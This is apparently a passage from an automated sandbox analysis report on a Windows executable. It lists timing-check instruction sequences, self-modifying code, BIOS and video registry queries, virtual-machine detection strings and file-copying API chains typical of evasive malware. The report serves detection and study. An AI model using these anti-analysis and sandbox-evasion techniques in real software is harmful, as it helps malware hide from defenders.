              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866F2D second address: 866F6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AAAh 0x00000007 jmp 00007F292CD65AB7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F292CD65AA6h 0x00000017 jmp 00007F292CD65AB1h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869D90 second address: 869DA1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F292CD152E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869DA1 second address: 869DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86995A second address: 86995E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86995E second address: 869966 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869AAE second address: 869ABA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F292CD152E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F751 second address: 87F755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F755 second address: 87F775 instructions: 0x00000000 rdtsc 0x00000002 je 00007F292CD152E6h 0x00000008 jmp 00007F292CD152EAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop esi 0x00000015 pop ebx 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F775 second address: 87F77B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FB31 second address: 87FB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FB3A second address: 87FB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FB3E second address: 87FB47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FC6C second address: 87FC70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FC70 second address: 87FC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F292CD152E6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FC7E second address: 87FC86 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FC86 second address: 87FC9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F292CD152F2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FF75 second address: 87FF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8800CC second address: 8800D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880226 second address: 88022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88022C second address: 88023B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F292CD152E6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88023B second address: 88023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88023F second address: 880247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882097 second address: 8820B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jp 00007F292CD65AA6h 0x0000000c popad 0x0000000d jmp 00007F292CD65AAEh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8820B2 second address: 8820BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8820BA second address: 8820DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F292CD65AB2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F292CD65AA6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8820DC second address: 882100 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jg 00007F292CD152EEh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882100 second address: 88211A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F292CD65AACh 0x0000000a jns 00007F292CD65AA6h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jne 00007F292CD65AA6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88211A second address: 88211E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884DAC second address: 884DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F292CD65AA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884E70 second address: 884E76 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F402AD second address: 4F402B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F402B1 second address: 4F402B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F402B7 second address: 4F402DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F292CD65AAEh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F402DA second address: 4F4031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, DEA4h 0x00000007 call 00007F292CD152EDh 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov bx, 0E40h 0x00000016 mov dh, CEh 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c mov di, ax 0x0000001f push eax 0x00000020 push edx 0x00000021 call 00007F292CD152F8h 0x00000026 pop ecx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4031C second address: 4F4033C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 pushad 0x00000009 mov edi, 1EB97DD0h 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007F292CD65AAFh 0x00000015 pop esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40357 second address: 4F40374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD152F8h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40374 second address: 4F40398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F292CD65AB0h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40398 second address: 4F4039E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4039E second address: 4F403D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F292CD65AACh 0x00000013 adc cl, 00000038h 0x00000016 jmp 00007F292CD65AABh 0x0000001b popfd 0x0000001c mov edx, eax 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F403D3 second address: 4F403E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F292CD152F0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F403E7 second address: 4F403FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F292CD65AAAh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F403FC second address: 4F40402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40402 second address: 4F40406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40406 second address: 4F4040A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F2AE second address: 79F2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F2B2 second address: 79F2B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5EFBFC instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5EFCA9 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 791C00 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7BD7CA instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7A3CBB instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27648
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-26466
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003B18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003BE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003B4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003B23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ADB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003ADB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_003B2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ADB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003ADB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003BCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_003BDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003BD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003A16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003A16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_003C1BF0
              Source: file.exe, file.exe, 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1519984196.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1519984196.0000000000F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000002.1519984196.0000000000F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26306
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26453
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26325
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26460
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26349
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
